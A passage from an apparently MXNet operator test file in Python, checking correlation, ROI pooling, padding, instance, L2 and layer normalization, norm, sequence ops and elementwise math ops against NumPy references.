paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
                # x1, y1 is the location in data1; i, j is the location in the output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1._simple_bind(default_context(),img1=img1.shape,img2=img1.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0], forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'], grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'], grad2, rtol=1e-3, atol=1e-4)
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
if arg_type1[0] != np.dtype(dtype) and arg_type1[1] != np.dtype(dtype) and out_type1[0] != np.dtype(dtype):
            msg = npt.build_err_msg([a, b],
                                    err_msg="Inferred type from a is not as expected, "
                                            "Expected: %s %s %s, Got: %s %s %s"
                                            % (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
                                    names=['a', 'b'])
raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
if arg_type2[0] != np.dtype(dtype) and arg_type2[1] != np.dtype(dtype) and out_type2[0] != np.dtype(dtype):
            msg = npt.build_err_msg([a, b],
                                    err_msg="Inferred type from b is not as expected, "
                                            "Expected: %s %s %s, Got: %s %s %s"
                                            % (dtype, dtype, dtype, arg_type2[0], arg_type2[1], out_type2[0]),
                                    names=['a', 'b'])
raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 0,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 0,pad_size = 5,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 0,pad_size = 5,is_multiply = True, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 0,stride2 = 1,pad_size = 4,is_multiply = True, dtype = dtype)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y._bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0]
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
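# NumPy reference for InstanceNorm: per sample and per channel, normalize over the
# spatial dims, then scale by `weight` (gamma) and shift by `bias` (beta).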
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
def check_instance_norm_with_shape(shape, xpu):
# build the InstanceNorm symbol and inputs
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y._bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0]
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
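# Checks L2Normalization against a NumPy reference for the 'channel' (along axis 1),
# 'spatial' (per sample and channel, over the spatial dims) and 'instance' (per sample,
# over all remaining dims) modes, then runs a numeric gradient check.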
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // (s[0] * s[1]), axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out._simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
assert_almost_equal(exe.outputs[0], np_out, rtol=1e-2 if dtype == 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
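# Checks LayerNorm against NumPy references: forward output, an optional finite-difference
# gradient check, and an optional analytic gradient check for both grad_req='write' and 'add'.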
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s._simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd, forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s._simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s._simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([2,3,4], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
for enforce_safe_acc in ['1', '0']:
with environment('MXNET_SAFE_ACCUMULATION', enforce_safe_acc):
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
npy_out = l1norm(in_data, i) if order == 1 else l2norm(in_data, i)
npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
npy_out = l1norm(in_data, (i, i+1)) if order == 1 else l2norm(in_data, (i, i+1))
npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype is np.float16 else 1e-3,
atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
@pytest.mark.parametrize('enforce_safe_acc', ['1', '0'])
@pytest.mark.parametrize('dtype,forward_check_eps,backward_check_eps,in_shape_l,finite_grad_check_l', [
(np.float16, 1E-2, 1E-2, [(10, 6, 5), (10, 10)], [True, True]),
(np.float32, 1E-3, 1E-3, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]),
(np.float64, 1E-4, 1E-4, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False])
])
def test_layer_norm(enforce_safe_acc, dtype, forward_check_eps, backward_check_eps,
in_shape_l, finite_grad_check_l):
with environment('MXNET_SAFE_ACCUMULATION', enforce_safe_acc):
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
if dtype == np.float16:
npy_grad_check = False
else:
npy_grad_check = True
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
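# Each helper first moves the sequence axis to position 1, giving [batch, seqlen, ...],
# applies the op in NumPy, and moves the axis back where the op preserves it.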
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
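# Runs SequenceLast / SequenceMask / SequenceReverse over several shapes, axes and index dtypes,
# with and without use_sequence_length, comparing the symbolic forward against the NumPy
# references above and checking numeric gradients for 'write', 'add' and 'null' grad requests.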
def check_sequence_func(ftype, mask_value=0, axis=0):
# set up data and sequence-length symbols
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@pytest.mark.skip(reason="Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len = None
use_sequence_length = False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev._bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev._bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
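# Generic forward/backward check for a binary elementwise op: fills two constant inputs,
# compares the symbolic forward against forward_numpy_call, and compares the input gradients
# against backward_numpy_call1/2 scaled by a constant output gradient.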
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test._bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
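# Unary counterpart of mathematical_core_binary: checks the forward output and the input
# gradient of a single-input elementwise op against its NumPy references.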
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
